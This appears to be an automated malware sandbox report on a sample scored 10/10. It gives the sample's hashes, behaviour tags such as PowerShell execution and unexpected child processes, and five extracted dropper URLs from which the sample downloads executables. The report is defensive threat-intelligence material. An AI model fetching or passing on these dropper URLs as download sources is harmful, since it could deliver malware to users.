General

  • Target

    64c7721f214f2abeb9b18d6b6adfab0b_JaffaCakes118

  • Size

    157KB

  • Sample

    240521-z1qsdsae73

  • MD5

    64c7721f214f2abeb9b18d6b6adfab0b

  • SHA1

    7946456854dbc7d4a546fc9d76396f1291cddf2a

  • SHA256

    3053c3fb5e3a2c477da4be62dfa79116f69be8568bb10959ed03772b17045de1

  • SHA512

    0f0673320a759197b82b6e2aec1cabb419fadc48a299eb22c847dadc63e52038c3bd669d5128c3899d081c561a15b29329cebf439c57d5691ed721c6e90af581

  • SSDEEP

    3072:HxjnB29gb8onOJ1vxkZy8f/xiHm8VAzy3X7:Hxy7JbkZy8Xym8VAzy3X

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://mikevictor.me/3pzsx

exe.dropper

http://faciusa.com/Qmb

exe.dropper

http://prahan.com/YNH

exe.dropper

http://lucianomoraes.com.br/BtDELY

exe.dropper

http://lcmtreinamento.com.br/RMd

Targets

    • Target

      64c7721f214f2abeb9b18d6b6adfab0b_JaffaCakes118

    • Size

      157KB

    • MD5

      64c7721f214f2abeb9b18d6b6adfab0b

    • SHA1

      7946456854dbc7d4a546fc9d76396f1291cddf2a

    • SHA256

      3053c3fb5e3a2c477da4be62dfa79116f69be8568bb10959ed03772b17045de1

    • SHA512

      0f0673320a759197b82b6e2aec1cabb419fadc48a299eb22c847dadc63e52038c3bd669d5128c3899d081c561a15b29329cebf439c57d5691ed721c6e90af581

    • SSDEEP

      3072:HxjnB29gb8onOJ1vxkZy8f/xiHm8VAzy3X7:Hxy7JbkZy8Xym8VAzy3X

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Start PowerShell.

MITRE ATT&CK Enterprise v15

Tasks